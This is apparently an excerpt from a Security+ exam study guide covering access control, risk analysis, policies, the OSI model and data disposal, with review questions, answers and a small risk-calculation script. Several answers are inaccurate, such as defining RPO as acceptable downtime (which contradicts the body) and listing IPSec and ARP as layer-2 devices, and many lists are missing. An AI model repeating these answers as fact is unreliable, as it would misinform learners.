Defense in depth is the concept of protecting a company's data with a series of defensive layers so that if one layer fails, another layer is already in place to thwart an attack. We start with our data, then we encrypt it to protect it:

Therefore, before someone can steal the data, they have seven layers of security that they must pass through. The concept of defense in depth is that if one layer fails, then the next layer protects:


Review questions

  1. What are the three components of the CIA triad?

  2. Why might a CCTV camera be sited outside a building without any film inside?

  3. What does confidentiality mean?

  4. How can we protect a data center from people entering it?

  5. What is the purpose of an airgap?

  6. Name three administrative controls.

  7. Name three physical controls.

  8. Following an incident, what type of control will be used when researching how the incident happened?

  9. How do I know if the integrity of my data is intact?

  10. What is a corrective control?

  11. What is the purpose of hashing?

  12. If I hash the same data with different SHA1 applications, what will the output be?

  13. What two things does HMAC provide?

  14. What type of control is it when I change the firewall rules?

  15. What is used to log into a system that works in conjunction with a PIN?

  16. What is the name of the person who looks after classified data, and who is the person that gives people access to the classified data?

  17. When you use a DAC model for access, who determines who gains access to the data?

  18. What is least privilege?

  19. What access control method does SELinux utilize?

  20. What is the Linux permission of 777? What access does it give you?

  21. What does the Linux permission execute allow me to do?

  22. The sales team is allowed to log into the company network between 9 a.m. and 10 p.m. What type of access control is being used?

  23. Only two people from the finance team are allowed to authorize the payment of cheques; what type of access control are they using?

  24. What is the purpose of the defense in depth model?

  25. When someone leaves the company, what is the first thing we should do with their user account?

Answers and explanations

  1. Confidentiality means only allowing those authorized to access data to gain access. Integrity means that data has not been tampered with. Availability means that data is available when you need it, for example when purchasing an airline ticket.

  2. We could place a CCTV camera in a prominent location as a deterrent; people walking past cannot tell whether it is recording or not, so it deters them anyway.

  3. Confidentiality means that we are limiting access to data to only those who should have access.

  4. To stop people entering a data center, we would install a mantrap, a turnstile-style device, so that we can control who enters the data center one person at a time.

  5. An airgap is exactly what it says: a physical gap between your network and a machine. We might use an airgap between a research and development machine and the corporate network.

  6. Administrative controls could be writing a new policy to make the company run smoothly; we may have just implemented change management. You could introduce a new form to ensure that all of the data required for an application is supplied. We could run annual security awareness training, complete a risk assessment, or commission penetration testing.

  7. The list of physical controls is huge. Remember that these can be physically touched. You can choose three from: cable locks, a laptop safe, biometric locks, fences, gates, burglar alarms, fire alarms, lights, security guards, bollards, barricades, a Faraday cage, key management, proximity cards, tokens, HVAC, an airgap, motion sensors, cameras, and biometric devices such as an iris scanner.

  8. If we investigate an incident, we need to collect all of the facts about the incident; this is a detective control. Think of a detective such as Sherlock Holmes, who is always investigating mysteries.

  9. If we hash the data before and after, and the hash value remains the same, then the integrity of the data is intact. If the second hash is different, the data has been tampered with.

  10. A corrective control is the action taken after an incident has happened in order to recover from it. For example, if the hard drive on my laptop fails, I will purchase a new hard drive, put it into my laptop, install the operating system and applications, then restore my data from a backup.


  11. Hashing is a technique that lets you know if data has been tampered with, but it does not hide the data.

  12. If the same data is hashed with two different applications that implement SHA1, the hash value will be the same; the algorithm is standardized, so the output depends only on the input.

  13. HMAC provides data integrity and data authentication (proof that the sender holds the shared key). You can use HMAC-SHA1 or HMAC-MD5; HMAC-SHA256 is preferred for new systems.

  14. If I change firewall rules, I am doing this to reduce risk; it is implemented in technology by the IT team, therefore it is a technical control.

  15. A smart card is a credit card-type device that has a chip built in; once it is inserted into the keyboard or a USB card reader, you will be asked to enter a PIN.

  16. The person who stores and manages classified data is called the custodian. The person who grants access to the classified data is the security administrator. Prior to getting access to the data, the person may well be vetted.

  17. In the DAC model, the data is unclassified and the data creator, also called the owner, decides who gains access to the data.

  18. Least privilege is a principle that says people should get only the limited access to data that they need to perform their job.

  19. SELinux uses the MAC model to control access to data. It is a set of kernel security extensions that add mandatory access control to Linux.

  20. In Linux, 777 gives the owner (the first digit), the group (the second digit), and all other users (the third digit) read, write, and execute. In symbolic form it is shown as rwxrwxrwx.

  21. The Linux execute (x) permission allows you to run a file and, on a directory, to enter it and search for entries by name.

  22. An access control method that applies either a time restriction or a location restriction is called rule-based access.

  23. A subset of a department with access to a subset of duties is called role-based access.

  24. The defense in depth model has many different layers; the idea behind this is that if one layer is broken through, the next layer will provide protection.

  25. When someone leaves the company, we should disable their account so that the keys associated with it are still available. The next stage is to change the password so that nobody can access it, especially the person who has just left.

Conducting Risk Analysis

As a security professional, you will need to understand that identifying and managing risks can help to keep your company environment safe from various types of attacks. In this chapter we will look at types of threats and vulnerabilities and the role that different threat actors play.

We will cover the following exam objectives in this chapter:

Risk management

Risk management is the process of identifying risks within a company and making decisions about how to reduce them so that an incident does not cause harm to the company and its assets. You may not be able to eliminate a risk completely, but you may be able to put procedures in place to reduce it or keep it at an acceptable level.

The first step in risk management is to identify the asset. Is it a top-secret document? If so, you would limit access to the document. The top-secret document would be stored in a secure area at all times; nobody would be able to take copies or photographs of it.

For example, if you had 1 kg of trash and you placed it outside your front door at night, you would be certain that in the morning it would still be there; however, if the asset was 1 kg of 24 carat gold and you left it outside your house at night, it would probably not be there in the morning.

The first step in risk management is identifying the asset because how we classify the asset will then determine how the asset is handled, stored, protected, and who has access to the asset.

Importance of policy, plans, and procedures

Creating policies, plans, and procedures is part of risk management and helps reduce the attack surface and prevent incidents from happening. Let us look at the different types of policies that can be used.


Standard operating procedures

Standard Operating Procedures (SOPs) give step-by-step instructions for how an activity is to be carried out. An example would be how to back up data. The SOP will state which data needs to be backed up daily, weekly, or monthly; critical data might be backed up every two hours, whereas archive data may be backed up monthly. The SOP would also state the medium to be used for the backup; it may be backed up to a NetApp or network share rather than to tape so that recovery is quicker.

Stage one in risk assessment is the classification of the asset; this then determines how it is accessed, stored, and handled.

Agreement types

Contracts between companies that want to purchase or sell services are very common as they protect both partners participating in the contract. We will now look at different agreement types that may be used in those contracts.

An SLA is measured in metrics, such as the percentage of the agreed service level that has been achieved.


For example, your company has an SLA with a service provider that will fix the printer within 4 hours. If the printer breaks down then the service provider needs to repair the printer within four hours or face a penalty. An SLA only relates to one product or service at one time. A company may have several SLAs in place that cover all of their equipment.

Personnel management—policies and procedures

Employing personnel is a key function of a successful business; however, employing people is high risk, as we need to employ the right type of person, who must be able to recognize cyber-crime attacks. To reduce the risk that employees pose, to prevent human resources from employing the wrong person, and to prevent fraud on an ongoing basis, the following policies can be adopted:


Let's look at an example. All members of the IT team can make any changes to the network firewall; this creates a huge risk to the network. An auditor could recommend that each firewall rule change is authorized by the Change Advisory Board and that two people are responsible for checking the changes to the firewall. With two people involved in each change, errors should be caught. This is an example of separation of duties.

Let's look at a second example. When I first got married, we opened a joint bank account that only my wages were paid into. My wife did the spending from this account even though she had her own account. I paid in, my wife withdrew—a true separation of duties. Nowadays I have my own account!

Separation of duties is where one person does not complete all configuration or transactions by themselves.


Other policies adopted by the company to help reduce risk are as follows:



Role—based awareness training

Role-based awareness training is mandatory training that an employee carries out annually; an example is the security awareness training that companies use to reduce their security risks. During the training, employees learn about social engineering attacks that target the employee, for example a phishing email. There is more information about attacks in Chapter 8, Protecting Against Attacks and Vulnerabilities, of this book.

A policy violation is where SOPs and policies have been ignored, for example transferring data from outside the company without using the VPN that the policy requires.

General security policies

General security policies affecting an employee using the internet are:

Business impact analysis concepts

Business impact analysis (BIA) looks at the financial loss relating to an incident; it does not look at the threat or at how the event occurred. It measures the additional cost arising from various factors.

Financial loss factors include the following:

Impact factors include the following:

BIA looks at the financial loss but does not look at the threat.

Privacy threshold assessment/privacy impact assessment

Personal data use, storage, and access are regulated and a company would be fined if they did not handle the data properly. There are two policies that we need to look at and these are the privacy threshold assessment and the privacy impact assessment. Let us now look at these:

Mission—essential functions/identification of critical systems

When we look at BIA as a whole, we have to identify the company's mission-essential functions; for example, an airline depends heavily on its website to sell airline tickets, and if the website failed it would lose revenue. The airline's critical systems would be the server that hosts the website and its connection to a backend database server, such as a SQL server, that holds ticketing information and processes the credit card transactions and order history for each customer.

Example

What would be the mission essential functions for a newspaper and what would be its critical systems?

Newspapers generate revenue not only via sales but more importantly by selling advertisement space in the paper. The mission—essential function would be the ad creation program that creates the advertisements and the critical systems would be the server that the program resides upon, the database for processing payments, and the systems used to print the newspapers.

Supply chain risk assessment

Your supply chain consists of the companies you rely upon to provide the materials you need to carry out a business function or make a product for sale. Say you are a laptop manufacturer: Company A provides the batteries and Company B provides the power supplies. If either of them runs short, it stops you from manufacturing and selling your laptops.

Example

Company C provides your broadband internet access and you are totally reliant upon them for the internet—you may mitigate the risk of the internet failing by adopting vendor diversity, where you purchase broadband from Company D so that if either of your suppliers fails you still have internet access, which is now crucial to any modern business.

Business impact analysis concepts

The following concepts are used for determining the business impact analysis:

RPO is the maximum amount of data loss the company can tolerate, measured as the time since the last recovery point (backing up every two hours gives an RPO of two hours), whereas RTO is the maximum time allowed to return to an operational state.

Calculating loss

The following concepts can be used to calculate the actual loss of equipment throughout the year and may be used to determine whether we need to take out additional insurance against the loss of the equipment:

Example

A multinational corporation loses 300 laptops annually and these laptops are valued at $850 each; would it take out an insurance policy to cover the cost of replacement if the insurance premium was $21,250 monthly?

The answer is no, because the cost of replacing them is the same as the cost of the insurance, they would take a risk on not losing 300 laptops next year.

The calculations are as follows:

Annual loss expectancy = Single loss expectancy X Annual rate of occurrence.



Risk procedures and concepts

Risk is the probability that an event will happen. It could bring profit, for example placing a bet on the roulette wheel in a casino might win you money, but it is more likely that a risk will result in financial loss or loss of service. Companies adopt a risk management strategy to reduce the risk posed to them, but may not be able to eliminate loss completely. In information technology, new technology comes out every day and poses more risk to a business, so risk management is ever evolving.

The main components are assets, risks, threats, and vulnerabilities:

A threat is something that will pose a danger by exploiting vulnerability. Vulnerability is a weakness that may be exploited and risk is the probability that an event will happen.

Threat assessment

A threat assessment helps a company classify its assets and then looks at the vulnerabilities of each asset. It considers all of the threats the company may face, the probability of each threat occurring, and the potential loss should the threat succeed:

Threat actors

A threat actor is another name for a hacker or attacker who is likely to attack your company; each type has different attributes. They will research your company from the outside, looking for details on social media and through search engines. Security companies offer open source intelligence (OSINT) assessments that report what an attacker could learn about you and which vulnerabilities that exposes. Let us now look at threat actor types:

A competitor is a threat actor who will try and steal a company's trade secrets to gain a market edge.

Risk treatment

Risk treatment looks at each individual risk; the risk owner, who is the best person to classify the asset, decides what action is best to take to reduce the risk to the company. The risk will then be included in the company's risk register so that it can be monitored. New risks should be recorded in the risk register immediately, and the risk register should be reviewed every six months, as risks change frequently as technology changes.

Residual risk is the amount of risk remaining after you mitigate the risk. Remember you cannot eliminate a risk totally.

Risk register

When we look at the overall risk for the company, we use a risk register. This is a list of all of the risks a company could face. The risk to the finance department will be assessed by the financial director, and IT-related risk will be looked at by the IT manager. Each department can identify its assets, classify them, and decide on the risk treatment. The financial director and IT manager are known as risk owners; they are responsible for their risks:

Ser | Date     | Owner      | Description    | Probability | Impact | Severity | Treatment                | Contingency           | Action taken
1   | 01/05/18 | IT Manager | Loss of switch | Low         | High   | High     | Transfer: 2-hour fix SLA | Purchase spare switch | 02/05/2018


Qualitative/quantitative risk analysis

There are two different approaches to risk assessment: qualitative and quantitative. Let us look at both of them:

In this example, we are going to grade a risk's impact and its probability from 1 to 9, with 1 being low and 9 being high. If we look at losing a mail server, the qualitative analysis would say that the impact is high but the probability of losing it is low; multiplying the two gives a score that can be compared with other risks in the register:

Impact (qualitative)   Probability   Risk score (impact x probability)
9                      3             9 x 3 = 27
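An added example, not from the book, that carries the chapter's two calculations through in code: the quantitative SLE and ALE from the laptop insurance question, turned into a cost/benefit test that says whether a control or an insurance premium pays for itself, and the qualitative probability x impact score used to rank risk register entries. The laptop figures are the book's; the cable-lock alternative, the switch and phishing register rows, and the exposure factor of 1.0 (total loss of each laptop) are assumptions for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class QuantitativeRisk:
    description: str
    asset_value: float      # replacement value of one asset
    exposure_factor: float  # fraction of that value lost in one incident (1.0 = total loss)
    aro: float              # annual rate of occurrence: incidents expected per year

    def sle(self) -> float:
        """Single loss expectancy: the cost of one incident."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annual loss expectancy = single loss expectancy x annual rate of occurrence."""
        return self.sle() * self.aro


def net_benefit(risk: QuantitativeRisk, annual_control_cost: float, aro_after: float) -> float:
    """ALE before the control, minus ALE after it, minus the control's yearly cost.
    Positive means the control (or the insurance premium) pays for itself."""
    residual = QuantitativeRisk(risk.description, risk.asset_value, risk.exposure_factor, aro_after)
    return risk.ale() - residual.ale() - annual_control_cost


def laptop_insurance_decision() -> dict:
    """The chapter's example: 300 laptops at $850 lost per year, premiums of $21,250 a month."""
    laptops = QuantitativeRisk("lost laptops", asset_value=850, exposure_factor=1.0, aro=300)
    premium = 21_250 * 12
    # Insurance transfers the loss, so the residual ARO borne by the company is 0.
    benefit = net_benefit(laptops, premium, aro_after=0)
    return {"sle": laptops.sle(), "ale": laptops.ale(), "annual premium": premium,
            "net benefit": benefit, "insure": benefit > 0}


def cable_lock_decision() -> dict:
    """Assumed alternative (not from the book): cable locks and training costing
    $30,000 a year that cut losses from 300 laptops to 100."""
    laptops = QuantitativeRisk("lost laptops", asset_value=850, exposure_factor=1.0, aro=300)
    benefit = net_benefit(laptops, 30_000, aro_after=100)
    return {"net benefit": benefit, "adopt": benefit > 0}


def qualitative_score(probability: int, impact: int) -> int:
    """Score on the chapter's 1-9 scales; the product ranks risks in the register."""
    for name, value in (("probability", probability), ("impact", impact)):
        if not 1 <= value <= 9:
            raise ValueError(f"{name} must be between 1 and 9, got {value}")
    return probability * impact


def rank_register(rows=None) -> list:
    """Order register entries highest score first. The default rows are constructed:
    the chapter's mail server plus two assumed entries."""
    rows = rows or [("loss of mail server", 3, 9), ("loss of switch", 2, 8), ("phishing of finance staff", 8, 6)]
    scored = [(desc, p, i, qualitative_score(p, i)) for desc, p, i in rows]
    return sorted(scored, key=lambda r: r[3], reverse=True)


if __name__ == "__main__":
    print(laptop_insurance_decision())
    print(cable_lock_decision())
    for desc, p, i, score in rank_register():
        print(f"{score:3}  {desc} (probability {p}, impact {i})")
```

For the book's figures the ALE and the annual premium are both $255,000, so the net benefit is exactly zero and the company gains nothing by insuring, which is the answer the text gives; the assumed cable-lock programme, by contrast, shows what a control that actually reduces the ARO looks like in the same arithmetic.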

Review questions

  1. What is the purpose of standard operating procedures?

  2. What is the purpose of BPA?

  3. What is the difference between an MOU and an MOA?

  4. What is the purpose of an ISA?

  5. What is the benefit of introducing separation of duties into the finance department?

  6. What is the purpose of a risk register?

  7. What is the purpose of job rotation?

  8. What is the purpose of mandatory vacations?

  9. What is the first stage in risk assessment?

  10. Why would a company introduce a clean desk policy?

  11. If someone brought their own laptop to be used at work, apart from an on-boarding policy, what other policy should be introduced?

  12. What is the purpose of an exit interview?

  13. When would you adopt risk avoidance?


  14. What is the purpose of risk transference?

  15. What are rules of behavior?

  16. Why would a company run an annual security awareness training programme?

  17. What is cognitive hacking and what should we avoid to mitigate it?

  18. What would happen if I tried to sell my car and sent an email to everyone who worked in my company using my Gmail account?

  19. Why would I make a risk assessment of one of my main suppliers?

  20. What is the driving force of Business Impact Analysis?

  21. What is the relationship between RPO and RTO?

  22. What information can be established from MTTR?

  23. What is the purpose of MTBF?

  24. What is the purpose of SLE and how is it calculated?

  25. How can we calculate the Annual Loss Expectancy (ALE)?

Answers and explanations

  1. Standard operating procedures are step-by-step instructions and how a task should be carried out so that employees know exactly what to do.

  2. A BPA is used by companies in a joint venture and it lays out each party's contribution, their right and responsibilities, how decisions are made, and who makes them.

  3. A memorandum of understanding (MOU) is a formal agreement between two parties, but it is not legally binding, whereas a memorandum of agreement (MOA) is similar but is legally binding.

  4. An Interconnection Security Agreement (ISA) states how connections should be made between two business partners. They decide on what type of connection to use and how it is to be secured; for example, they may use a VPN to communicate.

  5. If we adopted separation of duties in the finance department, we would ensure that nobody in the department did both parts of a transaction. For example, we would have one person collecting revenue and another person authorizing payments.

  6. A risk register lays out all of the risks that a company faces; each risk will have a risk owner who specializes in that area as well as the risk treatment.

  7. Job rotation ensures that employees work in all departments so that if someone leaves at short notice or is ill, cover can be provided. It also ensures that any fraud or theft can be detected.

  8. Mandatory vacations ensure that an employee takes at least five days of holiday and someone provides cover for them; this also ensures that fraud or theft can be detected.

  9. The first stage in risk assessment is identifying and classifying an asset. How the asset is treated, accessed, or scored is based on the classification.

  10. A Clean Desk policy is to ensure that no document containing company data is left unattended overnight.

  11. Someone bringing their own laptop is called BYOD and this is governed by two policies, the on—boarding policy and the Acceptable Use Policy (AUP). The AUP lays out how the laptop can be used, and accessing social media sites such as Facebook or Twitter are forbidden whilst using the device at work.

  12. An exit interview is to find out the reason why the employee has decided to leave; it may be the management style or that other factors in the company are not good. The information from an exit interview may help the employer improve terms and conditions and therefore have a higher retention rate.

  13. When a risk is deemed too dangerous or high risk and could end in loss of life or financial loss, we would treat the risk with risk avoidance and avoid the activity.

  14. Risk transference is where the risk is medium to high and you wish to offload the risk to a third party, for example by insuring your car.

  15. Rules of behavior are how people should conduct themselves at work to prevent sexual discrimination, bullying, or discrimination.

  16. Annual security awareness training advises employees of the risk of using email, the internet, and posting information on social media websites. It also informs employees of any new risk posed since the last training.

  17. Cognitive hacking is where a computer or information system attack relies on changing human users' perceptions and corresponding behaviors in order to be successful. This is a social engineering attack, and we could reduce the risk by being careful what we post on social media websites.

  18. Sending an email to everyone who works in your company using your Gmail account is a violation of the AUP and could lead to disciplinary action.

  19. A manufacturing company would carry out a supply chain risk assessment, as they need a reputable supplier of raw materials so that they can manufacture goods.

  20. Business impact analysis is just money; it looks at the financial impact following an event. The loss of earnings, the cost of purchasing new equipment, and regulatory fines are calculated.

  21. The Recovery Point Objective (RPO) is the acceptable downtime that a company can suffer without causing damage to the company, whereas the Recovery Time Objective (RTO) is the time by which the company is returned to an operational state; this should be within the RPO.

  22. Mean Time to Repair (MTTR) is the average time it takes to repair a system, but in the exam, it could be seen as the time to repair a system and not the average time.

  23. Mean Time Between Failures (MTBF) is the measurement of the reliability of a system.

  24. Single Loss Expectancy (SLE) is the cost of the loss of one item; if I lose a tablet worth $1,000, then the SLE is $1,000.

  25. The Annual Loss Expectancy (ALE) is calculated by multiplying the SLE by the ARO (the number of losses per year). If I lost six laptops a year worth $1,000 each, the ALE would be $6,000.

Implementing Security Policies and Procedures

In this chapter, we will look at different frameworks and guides and at how best to dispose of data. We will start off by looking at frameworks, reference architecture, and guides.

We will cover the following exam objectives in this chapter:

Industry standard frameworks and reference architecture

Industry standard frameworks are a set of criteria within an industry relating to carrying out operations known as best practices; this is the best way that the operations should be set up and carried out. Best practice produces better results than a standard way of setting up the operations.

These industry standard frameworks are carried out by all members of that industry. In networking, the International Standard Organization (ISO) is responsible for the industry framework within communications and the IT industry. The ISO is a body comprised of international standards bodies that mainly look at communication.

Reference architecture is a document or a set of documents to which a project manager or other interested party can refer for best practices; this will include documents relating to hardware, software, processes, specifications, and configurations, as well as logical components and their interrelationships.

ISO/IEC 17789:2014 specifies the cloud computing reference architecture (CCRA). The reference architecture includes the cloud computing roles, cloud computing activities, and the cloud computing functional components and their relationships.

OSI reference model

ISO developed the Open Systems Interconnection model (OSI model). It is a conceptual model that standardizes the communication functions of a telecommunications or computing system, without regard to its internal structure and technology.

The purpose of the OSI reference model is to provide guidance to vendors and developers so that products they develop can communicate with one another.

The OSI reference model is a seven-layer model, and each layer provides specific services. The CompTIA Security + exam focuses mainly on layers 2, 3, and 7:

| Layer | Description | Purpose | Packet structure | Devices |
|---|---|---|---|---|
| 7 | Application | The applications are Windows sockets, such as HTTP for web browsers or SMTP for email. | | |
| 6 | Presentation | Formats data into a character format that can be understood. It can also encrypt data. | | |
| 5 | Session | Responsible for logging in and out. | | |
| 4 | Transport | TCP: connection-oriented; UDP: connectionless | Datagrams | |
| 3 | Network | Responsible for Internet Protocol (IP) addressing and packet delivery | Packets | Layer 3 switch, router |
| 2 | Data link | Works with Media Access Control (MAC) addresses. Checks for transmission errors in incoming data and regulates the flow of data | Frames | Switch, VLAN, IPSec, ARP |
| 1 | Physical | Transmits data as raw bits over a physical medium (cables) | Bits | Hub, repeater |

Exam tip:
Although Security+ is not a networking exam, you must ensure that you are familiar with devices that operate at layers 2, 3, and 7. These will be covered fully in Chapter 5, Understanding Network Components, of this book.

TCP/IP model

The TCP/IP Protocol is the protocol or language used in modern communications; it is the only protocol used by the internet. The TCP/IP model is derived from the OSI reference model, and it is a four-layer model:

| Layers | TCP/IP model layers | Corresponding OSI layers |
|---|---|---|
| 4 | Application | Application, presentation, and session |
| 3 | Transport | Transport |
| 2 | Internet | Network |
| 1 | Network | Data link and physical |

Types of frameworks

There are different types of frameworks covered in the Security + exam, and these are listed here:

Benchmarks/secure configuration guides

Every company faces the challenge of protecting its servers and computers from an ever-increasing cyber security threat. There are many different types of servers: web servers, email servers, and database servers, and each of these has different configurations and services, so the baselines are different for each type of server. Vendors and manufacturers provide platform/vendor guides so that their products can be configured according to their own best practices and perform as well as they can.

Exam tip: Policies are written so that the security administrator knows what to configure, and end users know what part they play in keeping the company secure.

Policies and user guides

The management team will create policies that need to be adhered to by all employees, and these policies are created to help reduce the risk to the business and are mandatory; failure to carry out these policies is called policy violation and may lead to disciplinary action:

If a policy was created so that Data Loss Prevention (DLP) templates were created to prevent Personally Identifiable Information (PII) or sensitive data being emailed out of the company, then the security administrators would know exactly what to do.

The purpose of policies is to ensure that the security administrator knows what tasks they need to perform and also that end users know what their responsibilities are within each policy. Policies are an administrative control to help reduce risk.

Exam tip:
The auditor is the snitch: they won't ever stop a process, but they always inform management of non-compliance with company policies. The outcome following an audit will be either change management or a new policy being written.

Change management requests are sent to a Change Management Board (CMB). The board looks at the change request, what the financial implications are, and how changing one process affects other processes. If the change is really major, then a new policy could be written rather than just change management.

Example: New laptops are being purchased and configured for use within the company. The auditor is reviewing the process and finds that there is no anti-virus software being installed on these laptops; therefore, they report this back to management. Management then looks at the processes that are laid down for configuring new laptops and then uses change management to change the processes so that in future anti-virus software is installed before rolling them out to the rest of the company.

Security configuration guides – web servers

There are two main web servers used by commercial companies. Microsoft has a web server called Internet Information Services (IIS), and its rival is Apache. Web servers provide web pages for the public to view, and, because they are in the public domain, they are prime targets for hackers. To help reduce the risk, both Microsoft and Apache provide security guides to help security teams reduce their footprint, making them more secure:

https://msdn.microsoft.com/en-gb/library/zdh19h94.aspx

Web server security guides rely on the latest updates being in place, services that are not required being turned off, and the operating system being hardened, to make the server as secure as possible and reduce the risk of attack.

Network infrastructure device user guides

Cisco produces the best high-end network devices, and, because the networking world is ever evolving, Cisco has produced an infrastructure upgrade guide so that companies can use it as a best practice when upgrading their network devices. It can be seen at https://www.cisco.com/c/m/en_us/solutions/enterprise-networks/infrastructure-upgrade-guide.html.

General purpose guides

Security is critical for providing a safe working environment, and we now need to look at guidelines for vendor diversity, control diversity, technical controls, administrative controls, and the benefits of user training:

If we purchase two firewalls from Vendor A, we may also have two firewalls from Vendor B with the same configuration kept in a secure area within the company. Should there be a failure with one of the firewalls or a vulnerability in the Vendor A firewall, then we can quickly swap them with the firewalls from Vendor B. This ensures that the network remains secure at all times.

Implementing data security and privacy practices

One of the most critical areas in data security is the storing, accessing, and destroying of data when it is no longer required. In this section, we will look at the types, control, and destruction of data.

Destroying data and sanitizing media 

Data is controlled, handled, and stored based on its classification and privacy markings. Once this data has outlived its use, it needs to be destroyed so that it cannot be read by a third party. Data can be stored electronically on a computer's hard drive or kept as a hard copy by being printed. Most companies employ a third-party organization that specializes in data destruction and can provide a destruction certificate. Let's look at the different methods of destruction:


Destruction of hard drives can also be done by shredders that destroy the hard drive into smaller chunks. Take a look at the preceding photo, which shows the results of hard-drive shredding. Some hard-drive shredders can shred hard drives into much smaller chunks.

Data sensitivity labeling and handling

Securing and handling data is a critical part of security, as companies spend so much money completing the Research and Development (R&D) of a product because they don't want their competitors to know about their new product until it goes on the market. It is very important that the data is labeled according to its classification. Military data in the UK army is classified as unclassified, restricted, confidential, secret, and top secret, whereas a civilian company may classify data as confidential, private, public, and proprietary.

The first stage of risk management is classification of the asset, which determines how we handle, access, store, and destroy the data:

Data retention – legal and compliance

Data is retained either for legal reasons or to be compliant with statute law, which could be either the length of time the data should be retained or the national boundaries that data must be stored within. Multinational companies cannot just simply move data between national boundaries, as compliance forbids it:

Data roles

Everyone within a company will access data every day, but the company needs to control access to the data, and this is done by using data roles; we are now going to look at these roles:

Practical – creating a baseline

In this practical, we will download the Microsoft Baseline Security Analyzer (MBSA) tool, and then we will run the tool to see what missing patches and vulnerabilities the desktop may have. The Windows 10 desktop that this demo will be run on has only recently had the latest update (two days ago):

  1. Go to Google and search for the latest MBSA download (the current link is https://www.microsoft.com/en-gb/download/details.aspx?id=75580; at the time of writing, this is MBSA 2.3):

  2. Select the language that you require, and then press Download:

  3. All Windows 10 and Windows 8 desktops use 64 bit; I have selected 64 bit with English as the language. Press Next. Allow popups, and then select Run:

  4. Press Next:

  5. Select I accept the license agreement, and press Next:

  6. In the wizard, you can select the destination folder; select Next in the screen that follows, and select Install. During the installation, the UAC prompt will appear. Select Allow, and then the installation will be complete:

  7. After the installation completes, there will be a shortcut on the desktop, as shown here:

  8. Double-click the desktop icon; select Allow when the UAC prompt appears, and then the MBSA interface will appear:

  9. From here, you can either scan a single computer or multiple computers; please select Scan a computer, and then press Start scan. At this stage, it downloads security update information from Microsoft, and this may take some time:

  10. This then performs a scan, checking security update information from Microsoft.

The outcome of the scan will be similar to this:


The default scan result shows the vulnerabilities in red; blue is informational, and green is for the items that are compliant. Where there are vulnerabilities in red, the MBSA has hyperlinks so that these items can be resolved and so the desktop can be made as secure as possible.

Review questions

  1. What is an industry standard framework?

  2. What is the OSI reference model, and how many layers does it have?

  3. What is the TCP/IP protocol, and where is it used?

  4. Which layer of the OSI reference model does a switch operate?

  5. Which layer of the OSI reference model does a router operate?

  6. What is a regulatory framework, and is it legally enforceable?

  7. What type of frameworks are ITIL and COBIT 5, and are they legally enforceable?

  8. What three policies are used in a BYOD environment, and what purpose does each of them serve?

  9. What would happen if I were in an internet café at an airport and did not connect to the company network using a VPN and the data was intercepted?

  10. The FBI were investigating John Smith; therefore, the IT team placed his account on Legal Hold. John Smith decided to leave the company on February 12, and the IT team decided to delete his account on April 12, as nobody from the FBI had requested any evidence. On April 13, the FBI contacted the company asking for evidence. What policy could have ensured that the evidence was available for the FBI?

  11. What is the purpose of auditing, what power does the auditor have, and what is the likely outcome after the audit?

  12. What is the purpose of change management?

  13. Why do vendors produce security guides?

  14. What is the purpose of vendor diversity?

  15. What is the purpose of control diversity?

  16. What type of control are penetration test or vulnerability scans?

  17. How do companies normally dispose of classified printed material?

  18. What is the best way of disposing of a hard drive?

  19. What is the purpose of pulping, and when would it normally be carried out?

  20. What is the purpose of degaussing, and when will it be carried out?

  21. What is cluster tip wiping?

  22. If the company held information marked Public and Private, why would we then introduce classifications such as confidential and proprietary?

  23. Who is responsible for the securing and backing up of data?

  24. Who is responsible for allowing access to the data?

  25. What is the purpose of a privacy officer?

Answers and explanations

  1. Industry standard frameworks are a set of criteria within an industry, relating to carrying out operations known as best practices. This is the best way that the operations should be set up and carried out.

  2. The Open Systems Interconnection model (OSI model) is a conceptual model that standardizes the communication functions of a telecommunications or computing system without regard to its internal structure and technology. It has seven layers—application, presentation, session, transport, network, data link, and physical; these are layers seven, down to layer one.

  3. The TCP/IP protocol is the only protocol used in the internet, and most networks use it; each computer has an IP address to identify it.

  4. A switch operates at layer 2: the data link layer. There is a multilayer switch that works at layer 3, but the exam focuses on a switch and VLAN operating at layer 2. A switch is an internal device.

  5. A router whose function is to join networks together works at layer 3: the network layer. A router operates as an external device.

  6. A regulatory framework is based on statute law and governmental regulations; it is legally enforceable.

  7. ITIL and COBIT 5 are non-regulatory. These are not enforceable by law and are optional, but they provide a framework for companies to follow as a best practice for IT service management.

  8. The three types of policies needed for a BYOD environment are on-boarding, off-boarding, and the Acceptable Use Policy (AUP). The on-boarding policy states what needs to be done before a device can be allowed access to the network; the AUP states how the device should be used and restricts access to games and social media. When the exam mentions a BYOD environment, think of on-boarding and AUPs. The off-boarding policy states how to decommission a device from your network.

  9. Not using a VPN to connect to your network would be a policy violation against the remote access policy and would lead to disciplinary action being taken against the perpetrator.

  10. A data retention policy stating that data should be kept for six months following a person leaving the company, or a data retention policy stating never to delete data that has been placed on Legal Hold. Either of these would ensure that the FBI got its data.

  11. The role of the auditor is to ensure that the company's policies and processes are being carried out. Following an audit, either change management or the creation of a new policy are the likely outcomes.

  12. Change management regulates changes within a company so that they are controlled and risk is managed effectively. This stops employees doing their own thing.

  13. Vendors produce security guides so that their products can be set up according to their best practices, making them as secure as possible.

  14. Vendor diversity provides reliability and resiliency by having more than one solution in place; should one solution fail, then the company is still up and running. Business continuity is covered later in this book.

  15. Should one control fail, then another is in place; an example of this is if an attacker gets over the perimeter fence, then a guard with a guard dog would stop them going any further.

  16. Penetration tests or vulnerability scans are administrative controls; the vulnerability scan is less intrusive.

  17. Classified printed documents are normally put in burn bags that are collected by a third-party agency, who then incinerates them and provides the company with a destruction certificate.

  18. The best way to destroy a hard drive would be to shred it. Pulverizing is an alternative, but it is not as effective.

  19. Pulping can turn shredded paper into a sludge by using water or sulfuric acid. Try and read it now!

  20. Degaussing is where a magnetic field is applied to a hard drive, or a tape drive, to remove the data.

  21. Cluster tip wiping is removing the last remnants of data stored in the last data cluster.

  22. Having four classifications rather than two leads to better classification of the data.

  23. The custodian is responsible for securing and backing up data.

  24. The security administrator is responsible for granting access to the data. Remember: this is not the owner.

  25. The privacy officer is concerned with who is accessing the data and how it is shared; for example: are only doctors able to see a patient's medical history?

Delving into Identity and Access Management

In this chapter, we will look at different types of authentication and how to dispose of data. We will first look at identity and access management concepts.

We will cover the following exam objectives in this chapter:

Understanding identity and access management concepts

